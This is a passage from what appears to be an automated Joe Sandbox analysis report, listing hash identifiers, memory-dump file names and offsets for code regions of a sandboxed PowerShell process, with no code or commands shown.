                                                                          • Instruction Fuzzy Hash: C201A113F0EF9E0AE3F6936C18B6178BA81EF56610B5A01FAD69CD31C3EC0C6C415282
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8d25311222473c6ec763c7bad314df688977ce58d1253f6112c78e8455628c6a
                                                                          • Instruction ID: f57922b6eddf483b0c4bfec1b283825d3e4d99b5c76818fe09a6ae5a0e0cc84d
                                                                          • Opcode Fuzzy Hash: 8d25311222473c6ec763c7bad314df688977ce58d1253f6112c78e8455628c6a
                                                                          • Instruction Fuzzy Hash: DA018B73F0EF5A4FEBD9677C14611A863D1FF4525074804BAD14DC6193EC1DAC065381
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.4671284355.00007FFD34180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34180000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_7ffd34180000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 80cc90d10b4d02d3ad9b54a96cdcc7e2b38e36ecbc59a135e43771bd342466b3
                                                                          • Instruction ID: 874c78e01b3fe94a0502919392eae88bde4312de39111f7901f10c86c293dedb
                                                                          • Opcode Fuzzy Hash: 80cc90d10b4d02d3ad9b54a96cdcc7e2b38e36ecbc59a135e43771bd342466b3
                                                                          • Instruction Fuzzy Hash: 03F09633B0DF1A4BEB95976C14A55B8A3D1EF9A611754047AD14EC71A3EC1EA802A3C1